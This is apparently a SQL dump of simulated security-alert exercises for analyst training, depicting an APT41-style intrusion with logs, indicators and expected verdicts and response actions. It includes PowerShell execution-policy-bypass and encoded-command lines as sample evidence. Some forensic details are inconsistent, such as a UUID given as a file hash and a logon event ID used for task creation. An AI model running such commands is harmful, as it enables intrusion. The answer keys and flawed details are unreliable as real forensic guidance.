AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(415, 'Persistence Mechanism Activated', 'high', 'SIEM', 'The attackers have implemented persistence mechanisms, such as scheduled tasks and registry modifications, to ensure they can regain access even if initial efforts are disrupted. A suspicious scheduled task and registry key modification were detected on the host machine. This activity aligns with known APT41 tactics.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.50\",\"username\":\"jdoe\",\"scheduled_task\":\"UpdateCheck\",\"registry_key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"Updater.exe\",\"action\":\"Task Created\",\"description\":\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\",\"os\":\"Windows 10\"}', '2026-01-04 04:11:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious executable used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Updater.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"Executable linked to persistence mechanism.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in previous suspicious activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.020Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"scheduled_task\\\":\\\"UpdateCheck\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"filename\\\":\\\"Updater.exe\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\\\",\\\"os\\\":\\\"Windows 10\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.020Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"scheduled_task\\\":\\\"UpdateCheck\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"filename\\\":\\\"Updater.exe\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\\\",\\\"os\\\":\\\"Windows 10\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.020Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"scheduled_task\\\":\\\"UpdateCheck\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"filename\\\":\\\"Updater.exe\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\\\",\\\"os\\\":\\\"Windows 10\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.020Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"scheduled_task\\\":\\\"UpdateCheck\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"filename\\\":\\\"Updater.exe\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\\\",\\\"os\\\":\\\"Windows 10\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.020Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"scheduled_task\\\":\\\"UpdateCheck\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"filename\\\":\\\"Updater.exe\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\\\",\\\"os\\\":\\\"Windows 10\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(416, 'Lateral Movement Detected', 'high', 'User and Entity Behavior Analytics (UEBA)', 'APT41 is utilizing stolen credentials to move laterally across the network, targeting sensitive systems. This activity is characteristic of espionage operations and poses a significant threat to the organization\'s critical infrastructure.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:05Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.15\",\"username\":\"jdoe_admin\",\"event_type\":\"lateral_movement\",\"event_description\":\"Suspicious lateral movement detected using stolen credentials\",\"malware_hash\":\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\",\"filename\":\"APT41_Tool.exe\",\"observed_activity\":[{\"action\":\"login_attempt\",\"result\":\"success\",\"target_system\":\"10.0.5.15\"},{\"action\":\"file_access\",\"result\":\"success\",\"file\":\"Sensitive_Data.xlsx\"}]}', '2026-01-04 04:11:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalLogs\",\"verdict\":\"internal\",\"details\":\"Critical system targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalLogs\",\"verdict\":\"suspicious\",\"details\":\"Potentially compromised account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with APT41 lateral movement tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"APT41_Tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDB\",\"verdict\":\"malicious\",\"details\":\"APT41 malicious tool for network penetration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.021Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.15\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"event_description\\\":\\\"Suspicious lateral movement detected using stolen credentials\\\",\\\"malware_hash\\\":\\\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\\\",\\\"filename\\\":\\\"APT41_Tool.exe\\\",\\\"observed_activity\\\":[{\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"target_system\\\":\\\"10.0.5.15\\\"},{\\\"action\\\":\\\"file_access\\\",\\\"result\\\":\\\"success\\\",\\\"file\\\":\\\"Sensitive_Data.xlsx\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:31:19.021Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.15\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"event_description\\\":\\\"Suspicious lateral movement detected using stolen credentials\\\",\\\"malware_hash\\\":\\\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\\\",\\\"filename\\\":\\\"APT41_Tool.exe\\\",\\\"observed_activity\\\":[{\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"target_system\\\":\\\"10.0.5.15\\\"},{\\\"action\\\":\\\"file_access\\\",\\\"result\\\":\\\"success\\\",\\\"file\\\":\\\"Sensitive_Data.xlsx\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:30:19.021Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.15\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"event_description\\\":\\\"Suspicious lateral movement detected using stolen credentials\\\",\\\"malware_hash\\\":\\\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\\\",\\\"filename\\\":\\\"APT41_Tool.exe\\\",\\\"observed_activity\\\":[{\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"target_system\\\":\\\"10.0.5.15\\\"},{\\\"action\\\":\\\"file_access\\\",\\\"result\\\":\\\"success\\\",\\\"file\\\":\\\"Sensitive_Data.xlsx\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:29:19.021Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.15\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"event_description\\\":\\\"Suspicious lateral movement detected using stolen credentials\\\",\\\"malware_hash\\\":\\\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\\\",\\\"filename\\\":\\\"APT41_Tool.exe\\\",\\\"observed_activity\\\":[{\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"target_system\\\":\\\"10.0.5.15\\\"},{\\\"action\\\":\\\"file_access\\\",\\\"result\\\":\\\"success\\\",\\\"file\\\":\\\"Sensitive_Data.xlsx\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:28:19.021Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.15\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"event_description\\\":\\\"Suspicious lateral movement detected using stolen credentials\\\",\\\"malware_hash\\\":\\\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\\\",\\\"filename\\\":\\\"APT41_Tool.exe\\\",\\\"observed_activity\\\":[{\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"target_system\\\":\\\"10.0.5.15\\\"},{\\\"action\\\":\\\"file_access\\\",\\\"result\\\":\\\"success\\\",\\\"file\\\":\\\"Sensitive_Data.xlsx\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(417, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP)', 'In the final stage, the attackers attempt to exfiltrate valuable data to an external server, intending to use it for espionage purposes or to sell on the black market.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"185.92.220.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_name\":\"confidential_report.pdf\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"action\":\"blocked\",\"alert_id\":\"DLPA123456\",\"tool_used\":\"CCleaner Supply Chain\",\"severity\":\"High\"}', '2026-01-04 04:11:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration server used by APT41.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in the data exfiltration attempt.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with unauthorized data transfer attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.022Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"185.92.220.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPA123456\\\",\\\"tool_used\\\":\\\"CCleaner Supply Chain\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.022Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"185.92.220.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPA123456\\\",\\\"tool_used\\\":\\\"CCleaner Supply Chain\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.022Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"185.92.220.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPA123456\\\",\\\"tool_used\\\":\\\"CCleaner Supply Chain\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.022Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"185.92.220.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPA123456\\\",\\\"tool_used\\\":\\\"CCleaner Supply Chain\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.022Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"185.92.220.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPA123456\\\",\\\"tool_used\\\":\\\"CCleaner Supply Chain\\\",\\\"severity\\\":\\\"High\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(418, 'Phishing Email Detected', 'medium', 'Email Gateway Logs', 'A phishing email was detected originating from a known malicious IP address, targeting employees to harvest credentials. The email contains a suspicious attachment and a link to a phishing site.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"email_subject\":\"Urgent: Account Verification Required\",\"from_address\":\"support@secure-mail.com\",\"to_address\":\"john.doe@company.com\",\"attachment_name\":\"invoice_0923.docx\",\"attachment_hash\":\"3f9d4ff4e12a3e47a9f7b1c256b4c033\",\"phishing_url\":\"http://malicious-verify-login.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36\"}', '2026-01-04 04:13:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Company employee workstation\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f9d4ff4e12a3e47a9f7b1c256b4c033\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected in multiple AV engines\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-verify-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Active phishing site\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"support@secure-mail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"suspicious\",\"details\":\"Spoofed email address\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"invoice_0923.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Analysis\",\"verdict\":\"malicious\",\"details\":\"Contains macro with credential-stealing capabilities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:19.024Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(419, 'Malware Execution Alert', 'high', 'Endpoint Detection and Response (EDR)', 'The threat actors have successfully deployed malware on the compromised system to execute code that establishes a foothold within the network. This step follows the acquisition of valid credentials.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:22:35Z\",\"event_type\":\"execution\",\"source\":\"EDR\",\"host_ip\":\"192.168.1.15\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\\\Temp\\\\malicious.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"username\":\"jdoe\",\"attacker_ip\":\"203.0.113.89\"}', '2026-01-04 04:13:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"public_records\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Malware hash identified in multiple threat databases.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to establish foothold within the network.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_records\",\"verdict\":\"suspicious\",\"details\":\"User account used for unauthorized execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
